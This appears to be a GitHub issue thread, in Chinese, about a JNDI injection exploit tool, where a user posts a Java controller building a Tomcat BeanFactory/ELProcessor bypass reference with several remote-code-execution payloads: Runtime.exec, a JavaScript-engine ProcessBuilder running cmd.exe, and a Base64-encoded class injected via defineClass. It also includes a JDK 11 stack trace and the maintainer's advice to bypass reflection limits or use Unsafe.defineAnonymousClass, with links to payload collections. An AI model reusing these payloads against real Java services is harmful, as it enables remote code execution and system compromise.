Open whocansee opened 1 month ago
//发现有时候调用scriptenjen再执行会出现报错
@JNDIMapping("/{cmd}")
public byte[] UnscriptCommand(String cmd) throws Exception {
byte[] byteArray = cmd.getBytes();
return byteArray;
}
不好意思 我的问题 没有描述清晰 jdk 11.22 中 测试发现报错 Forced String setter eval threw exception for property x
问题可能是 通过code 通过javascirpt eng 执行可能会出错
yuan'sheng原生的似乎ok
补充 代码如下
package map.jndi.controller.bypass;
import map.jndi.annotation.JNDIController;
import map.jndi.annotation.JNDIMapping;
import map.jndi.controller.BasicController;
import org.apache.naming.ResourceRef;
import javax.naming.StringRefAddr;
import java.io.UnsupportedEncodingException;
/*
有时候 ScriptEngine 调用的时候无法直接
这个可以调用TomcatBypass/Unscript/calc.exe
将原生的修改为 TomcatBypassScript
*/
@JNDIController
@JNDIMapping("/TomcatBypass0")
public class TomcatBypass0Controller extends BasicController {
@Override
public Object process(byte[] byteCode) throws UnsupportedEncodingException {
// System.out.printf(str);
String str = new String(byteCode, "UTF-8");
String script = "";
ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true, "org.apache.naming.factory.BeanFactory", null);
ref.add(new StringRefAddr("forceString", "x=eval"));
String script1 = "Runtime.getRuntime().exec(\""+str+"\")";
String script2 = "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['cmd.exe','/C','"+str+"']).start()\")";
String script3 = "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"Runtime.getRuntime().exec('calc.exe')\")";
//System.out.println(script2);
String code = "var bytes = java.util.Base64.getDecoder().decode('yv66vgAAADQAJAoACQAUCgAVABYIABcKABUAGAgAGQcAGgoABgAbBwAcBwAdAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEACkV4Y2VwdGlvbnMBAAg8Y2xpbml0PgEADVN0YWNrTWFwVGFibGUHABoBAApTb3VyY2VGaWxlAQAHRTEuamF2YQwACgALBwAeDAAfACABAARjYWxjDAAhACIBAAdub3RlcGFkAQATamF2YS9pby9JT0V4Y2VwdGlvbgwAIwALAQACRTEBABBqYXZhL2xhbmcvT2JqZWN0AQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwEAD3ByaW50U3RhY2tUcmFjZQAhAAgACQAAAAAAAgABAAoACwACAAwAAAAuAAIAAQAAAA4qtwABuAACEgO2AARXsQAAAAEADQAAAA4AAwAAAAsABAAMAA0ADQAOAAAABAABAAYACAAPAAsAAQAMAAAATwACAAEAAAASuAACEgW2AARXpwAISyq2AAexAAEAAAAJAAwABgACAA0AAAAWAAUAAAAGAAkACQAMAAcADQAIABEACgAQAAAABwACTAcAEQQAAQASAAAAAgAT');var classLoader = java.lang.Thread.currentThread().getContextClassLoader();var method = java.lang.ClassLoader.class.getDeclaredMethod('defineClass', ''.getBytes().getClass(), java.lang.Integer.TYPE, java.lang.Integer.TYPE);method.setAccessible(true);var clazz = method.invoke(classLoader, bytes, 0, bytes.length);clazz.newInstance();";
String script4 = "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\""+code+"\")";
//这里发现远原生的Runtime script3可以
//js执行processbuild可以 案例 script2 可以
//js执行runtime 案例 script3 不行
//js 执行 defineclass 的 案例script4 不行
//js 直接执行
ref.add(new StringRefAddr("x", script2));
return ref;
}
}
我测试发现 jdk确实很关键 jdk-11.0.22 中不能使用 nashorn 。。。。
Warning: Nashorn engine is planned to be removed from a future JDK release
Exception in thread "main" java.lang.reflect.InaccessibleObjectException: Unable to make protected final java.lang.Class java.lang.ClassLoader.defineClass(byte[],int,int) throws java.lang.ClassFormatError accessible: module java.base does not "opens java.lang" to module jdk.scripting.nashorn.scripts
at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:340)
at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:280)
at java.base/java.lang.reflect.Method.checkCanSetAccessible(Method.java:198)
at java.base/java.lang.reflect.Method.setAccessible(Method.java:192)
at jdk.scripting.nashorn.scripts/jdk.nashorn.internal.scripts.Script$Recompilation$7$\^eval\_$cu1$restOf.:program(<eval>:1)
at jdk.scripting.nashorn/jdk.nashorn.internal.runtime.ScriptFunctionData.invoke(ScriptFunctionData.java:655)
at jdk.scripting.nashorn/jdk.nashorn.internal.runtime.ScriptFunction.invoke(ScriptFunction.java:513)
at jdk.scripting.nashorn/jdk.nashorn.internal.runtime.ScriptRuntime.apply(ScriptRuntime.java:527)
at jdk.scripting.nashorn/jdk.nashorn.api.scripting.NashornScriptEngine.evalImpl(NashornScriptEngine.java:456)
at jdk.scripting.nashorn/jdk.nashorn.api.scripting.NashornScriptEngine.evalImpl(NashornScriptEngine.java:413)
at jdk.scripting.nashorn/jdk.nashorn.api.scripting.NashornScriptEngine.evalImpl(NashornScriptEngine.java:409)
at jdk.scripting.nashorn/jdk.nashorn.api.scripting.NashornScriptEngine.eval(NashornScriptEngine.java:162)
at java.scripting/javax.script.AbstractScriptEngine.eval(AbstractScriptEngine.java:264)
at test.A1.main(A1.java:23)
看了下, 需要绕过高版本 JDK 反射的限制, 或者直接反射调用 Unsafe.defineAnonymousClass, 可以先参考: https://github.com/yzddmr6/Java-Js-Engine-Payloads https://github.com/knownsec/KCon/blob/master/2021/%E9%AB%98%E7%BA%A7%E6%94%BB%E9%98%B2%E6%BC%94%E7%BB%83%E4%B8%8B%E7%9A%84Webshell.pdf
我这边期末周了, 晚点会修复
测试版本:JDK8u66、JDK8u121,Windows,不能执行命令